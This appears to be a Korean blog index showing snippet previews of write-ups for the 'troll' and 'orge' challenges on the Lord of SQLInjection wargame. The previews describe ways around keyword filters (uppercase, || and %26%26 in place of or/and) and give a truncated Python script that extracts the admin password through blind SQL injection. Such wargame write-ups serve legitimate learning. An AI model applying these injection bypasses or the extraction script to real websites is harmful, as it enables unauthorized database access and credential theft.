목록LOS (17)
Bace
LOS - troll
문제는 다음과 같다. admin을 필터링하고 있다. id만 admin으로 보내면 되므로 0x61646d696e 로 우회해보았다. 우회되지 않는다. 대문자로도 적어보았더니 풀렸다.
LOS
2020. 1. 17. 15:37
LOS - orge
문제는 다음과 같다. orc 문제와 거의 똑같지만 or과 and를 필터링한다. or은 || , and는 %26%26 으로 우회하였다. 일단 orc 때 코딩해놓았던 코드를 재사용해보았다. import requests answer = '' for i in range(1,9): for j in range(33,128): url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20||%20%20id=%27admin%27%20%26%26%20ascii(substr(pw,{},1))%20=%20{}%20--%20-".format(i,j) cookies = {'PHPSESSID':'자신의 PHPSESSID'} respons..
LOS
2020. 1. 17. 15:17